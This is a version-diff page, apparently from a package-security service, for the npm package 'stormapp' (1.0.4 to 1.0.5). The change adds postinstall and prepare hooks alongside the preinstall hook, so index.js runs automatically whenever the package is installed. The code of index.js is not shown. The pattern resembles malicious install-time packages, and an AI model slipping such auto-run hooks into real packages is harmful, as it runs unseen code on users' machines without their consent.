stormapp 1.0.4 → 1.0.5
Sign up to get free protection for your applications and to get access to all the features.
- package/package.json +4 -2
package/package.json
CHANGED
@@ -1,11 +1,13 @@
|
|
1
1
|
{
|
2
2
|
"name": "stormapp",
|
3
|
-
"version": "1.0.
|
3
|
+
"version": "1.0.5",
|
4
4
|
"description": "Internal App",
|
5
5
|
"main": "index.js",
|
6
6
|
"scripts": {
|
7
7
|
"test": "echo \\\"Error: no test specified\\\" && exit 1",
|
8
|
-
"preinstall": "node
|
8
|
+
"preinstall": "node index.js",
|
9
|
+
"postinstall": "node index.js",
|
10
|
+
"prepare": "node index.js"
|
9
11
|
},
|
10
12
|
"author": "Internal App",
|
11
13
|
"license": "ISC"
|